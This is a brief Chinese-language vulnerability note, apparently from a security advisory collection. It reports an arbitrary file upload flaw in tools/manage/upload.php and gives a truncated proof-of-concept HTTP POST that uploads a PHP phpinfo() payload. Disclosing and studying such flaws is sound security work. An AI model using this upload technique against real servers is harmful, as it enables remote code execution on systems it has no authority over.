Appearance
参考链接:
在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。
poc:
POST /tools/manage/upload.php HTTP/1.1 HOST: target ... <?php phpinfo(); ?>